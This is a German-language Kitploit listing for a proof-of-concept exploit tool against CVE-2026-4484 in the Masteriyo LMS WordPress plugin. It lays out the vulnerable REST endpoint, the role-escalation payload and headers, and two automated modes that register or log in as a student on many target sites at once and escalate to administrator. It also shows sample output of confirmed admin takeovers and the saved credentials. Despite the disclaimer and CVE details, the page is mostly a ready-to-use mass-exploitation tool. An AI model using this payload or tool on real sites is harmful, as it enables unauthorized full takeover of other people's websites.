Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 – Fehlende Autorisierung für authentifizierte (Student+) Benutzer: Privilegienerweiterung zum Administrator | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-4484
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 – Fehlende Autorisierung für authentifizierte (Student+) Benutzer: Privilegienerweiterung zum Administrator

Repository anzeigen
5vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Fehlende Autorisierung führt zu authentifizierter (Student+) Privilegieneskalation zum Administrator

Typing SVG


🔴 Schwachstellenübersicht

CVE-2026-4484 — Authentifizierte Privilegieneskalation (Student → Administrator)

Beschreibung:
Das Masteriyo-LMS-Plugin für WordPress ist in allen Versionen bis einschließlich 2.1.6 anfällig für Privilegieneskalation. Die Schwachstelle hat ihren Ursprung in der Funktion InstructorsController::prepare_object_for_database, die bei REST-API-Anfragen die Rollenzuweisung nicht ordnungsgemäß einschränkt. Ein authentifizierter Angreifer mit lediglich Student-Level-Zugriff kann eine speziell gestaltete POST-Anfrage an den Masteriyo-REST-API-Endpunkt senden — indem er "roles": ["administrator"] in die Anfrage-Nutzdaten einfügt — und so sein Konto stillschweigend zum WordPress-Administrator erweitern, was eine vollständige Übernahme der Website ohne jegliche administrative Interaktion ermöglicht.


🛠️ Tool-Beschreibung

Dies ist ein Proof-of-Concept-Exploit-Skript (PoC), das sich gegen WordPress-Installationen richtet, die eine verwundbare Version des Masteriyo-LMS-Plugins ausführen. Das Tool unterstützt zwei Angriffsmodi:

ModusNameAblaufAnwendungsfall

Angriffsablauf

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Anforderungen

Systemanforderungen

  • Python 3.8 oder höher
  • Linux / Windows / macOS

Python-Abhängigkeiten

root@kitploit:~
pip install requests urllib3 colorama

Oder über die Requirements-Datei:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Verwendung

Grundlegender Start

root@kitploit:~
python3 CVE-2026-4484.py

Das Tool verwendet eine interaktive Terminal-Oberfläche — alle Parameter werden zur Laufzeit abgefragt.


🗂️ Format der Zielliste

Erstellen Sie eine einfache Textdatei (z. B. list.txt) mit einem Ziel pro Zeile:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Modus 1 — Nx_1 (Registrieren + Anmelden + Eskalieren)

Verwenden Sie diesen Modus, wenn Sie kein bestehendes Konto auf dem Ziel haben. Das Tool registriert automatisch ein neues Studentenkonto und eskaliert es anschließend.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Automatisch ausgeführte Schritte:

  1. GET /account/signup/ → Registrierungs-Nonce extrahieren
  2. POST /st/ → neues Konto als Student registrieren
  3. GET /account/ → Login-Nonce extrahieren
  4. POST /wp-admin/admin-ajax.php → über Masteriyo-AJAX anmelden
  5. GET /account/#/dashboard → current_user_id + nonce extrahieren
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} mit {"roles":["administrator"]}
  7. Mit neuer Sitzung erneut anmelden → Zugriff auf das Admin-Panel verifizieren
  8. Bestätigte Treffer in Login_admin.txt schreiben

🟩 Modus 2 — Nx_2 (Anmelden + Eskalieren — Bestehendes Konto)

Verwenden Sie diesen Modus, wenn Sie bereits über ein gültiges Studenten- oder Dozentenkonto auf dem Ziel verfügen.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Automatisch ausgeführte Schritte:

  1. GET /account/ → Login-Nonce extrahieren
  2. POST /wp-admin/admin-ajax.php → über Masteriyo-AJAX anmelden
  3. GET /account/#/dashboard → current_user_id + nonce extrahieren
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} mit {"roles":["administrator"]}
  5. Mit neuer Sitzung erneut anmelden → Zugriff auf das Admin-Panel verifizieren
  6. Bestätigte Treffer in Login_admin.txt schreiben

📁 Ausgabedateien

DateiBeschreibung
Login_admin.txtAlle bestätigten Administrator-Eskalationen

Ausgabeformat

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Beispiel für Terminal-Ausgabe

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Technische Details

Verwundbarer Endpunkt

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Exploit-Payload

root@kitploit:~
{
  "roles": ["administrator"]
}

Erforderliche Header

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Hauptursache

Die Funktion InstructorsController::prepare_object_for_database in Masteriyo LMS verarbeitet den Parameter roles aus dem REST-Anfragekörper, ohne zu prüfen, ob der anfragende Benutzer über die Berechtigung edit_users oder promote_users verfügt. Jeder authentifizierte Benutzer (Student-Level oder höher), der diesen Endpunkt erreichen kann, kann einen beliebigen Rollenwert übermitteln — einschließlich administrator — der dann direkt in der WordPress-Benutzermetadaten-Tabelle gespeichert wird.


📡 Kontakt & Autor

Von: Nxploited (Khaled Alenazi)

 


⚠️ Rechtlicher Haftungsausschluss

DIESES TOOL WIRD AUSSCHLIESSLICH ZU BILDUNGSZWECKEN UND FÜR AUTORISIERTE SICHERHEITSFORSCHUNG BEREITGESTELLT.

Der Autor, Nxploited (Khaled Alenazi), und alle Mitwirkenden an diesem Projekt billigen, unterstützen oder übernehmen keinerlei Verantwortung für den Missbrauch dieses Tools oder für Schäden, die durch die Verwendung dieser Software gegen Systeme entstehen, für die Sie keine ausdrückliche schriftliche Genehmigung besitzen.

  • ✅ Erlaubt: Verwendung auf Systemen, die Sie besitzen oder für die Ihnen eine ausdrückliche schriftliche Genehmigung zum Testen erteilt wurde.
  • ❌ Verboten: Verwendung gegen beliebige Systeme ohne vorherige ausdrückliche schriftliche Genehmigung des Systeminhabers.

Unbefugter Zugriff auf Computersysteme ist rechtswidrig und wird nach den geltenden Gesetzen geahndet, einschließlich, aber nicht beschränkt auf den Computer Fraud and Abuse Act (CFAA), den Computer Misuse Act (CMA) und gleichwertige Gesetze weltweit.

Durch die Nutzung dieses Tools übernehmen Sie die alleinige Verantwortung für Ihre Handlungen und bestätigen, dass Sie die rechtliche Befugnis haben, die Zielsysteme zu testen.

Der Autor übernimmt keinerlei Haftung für direkte, indirekte, zufällige oder Folgeschäden, die aus der Nutzung oder dem Missbrauch dieser Software entstehen.


© 2026 Nxploited (Khaled Alenazi) — Nur für autorisierte Sicherheitsforschung.

Tool herunterladen
FeldDetails
CVE-IDCVE-2026-4484
SchweregradHOCH — CVSS v3.1-Wert: 8.8
VektorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Betroffene SoftwareMasteriyo-LMS-Plugin für WordPress
Betroffene VersionenAlle Versionen bis einschließlich 2.1.6
SchwachstellentypPrivilegieneskalation (Rollenmanipulation)
Erforderliche AuthentifizierungJa — Student-Level oder höher
CWECWE-269: Unzureichende Privilegienverwaltung
1
Nx_1
Registrieren → Anmelden → Eskalieren → Admin verifizieren
Frischer Angriff — kein bestehendes Konto erforderlich
2Nx_2Anmelden → Eskalieren → Admin verifizierenBestehendes Konto vorhanden (Student/Dozent)